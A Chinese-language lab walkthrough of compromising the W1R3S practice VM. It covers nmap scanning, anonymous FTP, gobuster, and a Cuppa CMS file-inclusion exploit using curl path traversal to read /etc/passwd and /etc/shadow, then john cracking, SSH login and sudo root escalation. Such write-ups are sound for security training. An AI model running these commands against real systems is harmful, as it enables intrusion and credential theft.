w1r3s--靶机实操详解

扫描及搜索信息阶段

先查询本机存在的网段

ipconfig

请添加图片描述

然后对网段进行扫描

sudo nmap -sn 存在网段/24
在端口发现之后不进行端口扫描,只打印主机嗅探的可用主机

请添加图片描述

可知:

.139是我们本机的地址,而.138是靶机所在的地址

新建一个文件夹

在这里插入图片描述

进行端口扫描,扫描ip,并把内容存放在nmapscan下的ports文件

sudo nmap -sT --min-rate 10000 -p- 192.168.203.138 -oA nmapscan/ports

-sT :明确指定以TCP协议进行扫描(UDP则是-sU)。利用三次握手来判断端口状态。速度相对较慢,但它更加准确。
-sS是默认的扫描技术,利用SYN来探索目标主机上的开放端口,用于快速扫描主机的端口状态。

--min-rate:设定最慢的扫描每秒发包速率,避免判定为恶意扫描。

-p-: -p是指定端口范围的参数,而后面的-是简化的指定1~65535全部端口进行扫描。

-oA: o是输出,A是ALL。

请添加图片描述

查看pos输出结果

ls -liah nmapscan

在这里插入图片描述

可以看见,有三个不同格式的文件,gnamp是被已经被放弃了;

nmap和屏幕输出的是一致的;

xml的内容更是附带一定编程性。

请添加图片描述

请添加图片描述

请添加图片描述

把端口单独提出,多用于端口较多的情况

grep open nmapscan/ports.nmap | awk -F'/' '{print $1}'

使用grep去搜索nampscan/ports.nmap的扫描结果
用awk -f指定参数,用斜杠做分隔符打印出第一列

请添加图片描述

扫描各个端口的服务

sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.203.138 -oA nmapscan/dail
-sT:指定使用TCP协议扫描
-sV:探测各服务版本
-sC:用默认的脚本进行扫描
-O:探测操作系统的版本
-p:指定端口,后接端口
-oA:全格式输出到.....

请添加图片描述

21号端口使用ftp协议,可能存在信息泄露;

22是SSH服务,有乌班图的信息。但直接通过SSH拿到登录权限的意义不大,但不绝对;

80端口是阿帕奇服务;

3306可能是mysql服务;

进行漏洞脚本扫描,并把结果存放在nmapscan/vuln中。

sudo nmap --script=vuln -p21,22,80,3306 192.168.203.138 -oA nmapscan/vuln

请添加图片描述

21和22没有太多的信息。

80端口提示没有csrf漏洞发现,也没有xss漏洞发现,只有一个slowloris可以利用DOS攻击,但过于暴力没啥技术含量。

3306也没啥发现。

(当没有攻击面的时候,可能有ipv6的地址)

渗透阶段

进行ftp渗透

ftp 192.168.203.138

在这里插入图片描述

输入后进入匿名登录,匿名登录的账号都是anonymous,密码为空,直接回车。

这里显示成功登录。

渗透测试到FTP中,首先想到的是,用binary去切换到二进制模式。

在这里插入图片描述

可以使用?来显示交互命令
在这里插入图片描述

使用 ls 来查看列表

在这里插入图片描述

进入content,查看文件夹存在文件

在这里插入图片描述

输入prompt把交互式的提示词关闭

prompt

在这里插入图片描述

输入mget下载多个文件

mget *.txt
m:多个

在这里插入图片描述

回到上一级,进入docs,下载里面的txt文件

在这里插入图片描述

回到上一级,进入new-employees,下载里面的employee-names.txt
在这里插入图片描述

这样所有内容就下载完毕,可以退出ftp了。

MD5破解

我们退出ftp后,ls查看下载的文件,并使用cat打开

cat *.txt

在这里插入图片描述

可以看到中间有一串字符,我们可以使用kali工具里的hash identifier去进行识别

hash-identifier 字符串

可以看到识别的字符串可能是MD5加密;

如果怀疑识别不准的话,可以直接粘贴到浏览器进行查询;

在这里插入图片描述

建立md5的文件,并把字符串粘贴进去,wq!保存退出

vim md5.hash

在这里插入图片描述

使用john进行破解,但结果不是很理想,我们可以通过网站来进行破解

在这里插入图片描述
在这里插入图片描述

解密结果为“这不是密码”。咱们暂且相信他的鬼话。

网站:(https://www.somd5.com/)

base64破解

还有一串编码,使用john无法识别,放浏览器也没有多少识别信息,只能凭借经验来识别他是base64编码,末尾的“==”也许是base64特有的标识符?

echo "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d

在这里插入图片描述

可以看到解码后也没啥有用的信息

角色视角带入

我们还遗漏了一个信息,就是这家公司的员工列表

在这里插入图片描述

我们来进行一个角色的分析

经理,可能有一些基于业务的特殊权限,也有可能有所有员工的数据;

IT,可能有各个系统权限相关的数据信息,例如ftp信息、账户信息等等;

web,对于我们没啥用,咱们是渗透拿权限的,不是扒人家裤腿子的;

Inventory,做库管的,可能拥有员工数据和货物数据;

human,人力资源,可能拿着的是全部人员的最详细的信息;

字符的破译

下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询

在这里插入图片描述

网站链接:https://www.upsidedowntext.com/

在这里插入图片描述

“我不认为这是通向root的方式”

还有一个字符,我们继续进行破解

在这里插入图片描述

“我们还有很多事要做,还不能闲逛(休息)哦”

就这样,21端口的ftp渗透测试就到此为止了

mysql渗透

我们去浅尝试一下3306的mysql

mysql -h 192.168.203.138 -u root -p

在这里插入图片描述

显示当前kali不被允许连接到mysql,显然3306是不成功的

80端口服务查询

我们看一下80的端口跑的啥服务

在这里插入图片描述

发现是阿帕奇的默认页面,也没啥信息

目录爆破

我们进行目录爆破

如果没有安装gobuster,需要先安装

安装代码
sudo apt install gobuster

安装好了之后输入

sudo gobuster dir -u http://192.168.203.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

directory-list-2.3-medium.txt是kali自带的一个目录字典。

在这里插入图片描述

我们分别打开这三个链接

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

现在能暴露出来的就两个,一个是wordpress,一个是adminstrator

我们先重点看以下wordpress,但问题是自动跳转到local host ,我们试着修改以下host文件,看一下能不能访问到网站。

sudo vim /etc/hosts

把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。

在这里插入图片描述

如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。

可以看到,新域名能够访问,而localhost不行

在这里插入图片描述

在这里插入图片描述

现在wordpress看完了,我们来看adminstrator

在这里插入图片描述
点击next(可能会对系统造成不可逆操作,也许会被通知管理员),看到的是安装的配置页,数据库和用户管理员设置。

在这里插入图片描述

在评估风险后,我们选择填入信息,然后下一步

密码和名字一致,防止记错

在这里插入图片描述

获得以下信息

在这里插入图片描述

点击back又回到了上一个页面,也许我们可以换个方向,寻找以下有无公开漏洞

searchsploit cuppa cms

搜索这个数据库的本地拷贝

在这里插入图片描述

我们可以看到有一条数据,但我们没有别的选择,只能先下载

searchsploit cuppa -m 25971


SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。

下面是相关的参数:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到我们已经下载完成了,使用cat打开看看。

在这里插入图片描述

这里我们也发现了一些漏洞和利用

在这里插入图片描述

我们接着往下看

在这里插入图片描述

翻译:攻击者可能包含本地或远程 PHP 文件,或者读取具有此漏洞的非 PHP 文件。创建将包含在当前文件中的文件名时使用用户污染的数据。将评估此文件中的 PHP 代码,非 PHP 代码将嵌入到输出中。此漏洞可能导致服务器完全受损。

阐述了漏洞的危害

下面给了漏洞的利用过程,可以有远程包含,也可以有passwd的读取

在这里插入图片描述

我们下载一下这个它的数据包

wget http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip

在这里插入图片描述

我们直接使用图形化的方式打开(绝对不是懒得打代码,肯定不是)

找到/administrator/alerts/alertConfigField.php文件

在这里插入图片描述

他说是22行出了问题

在这里插入图片描述

但很明显22行没有指定参数,我们可以直接关键词寻找。
在这里插入图片描述

我们在77行发现了关键字,可以发现,它是用post的方式来处理传过来的参数的,并且没有做任何处理。

使用curl,对数据进行url编码,并且通过post的方式进行传递

curl --data-urlencode  urlConfig=../../../../../../../../../etc/passwd http://192.168.203.138/administrator/alerts/alertConfigField.php 

将变量urlcnfig的内容通过url编码给到处理程序。

在这里插入图片描述

看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。

shadow文件用于存放密码。

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.203.138/administrator/alerts/alertConfigField.php

在这里插入图片描述

可以拿下,这样我们就可以去破解。我们把三个用户密码保存,使用john破解。

vim shadow.h

在这里插入图片描述

使用john进行解密

john shadow.h

在这里插入图片描述

首先破解了这两个www-data , w1r3s账户,我们先试试w1r3s的相关权限

sudo ssh w1r3s@192.168.203.138

在这里插入图片描述

登录成功,我们查看一下具体信息。拥有27sudo的权限

在这里插入图片描述

我们提权一下sudo

sudo -l

在这里插入图片描述

我们发现用户有三个ALL权限,意味着基本等于root用户了。

那我们启动一个新的bash会话

新建一个sh文件,

echo '/bin/bash' >> root.sh

赋权

chmod +x root.sh

获取root命令

sudo ./root.sh

在这里插入图片描述

我们进入root目录,找到flag文件,打开

在这里插入图片描述

这样我们就打完了心中的靶机()

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值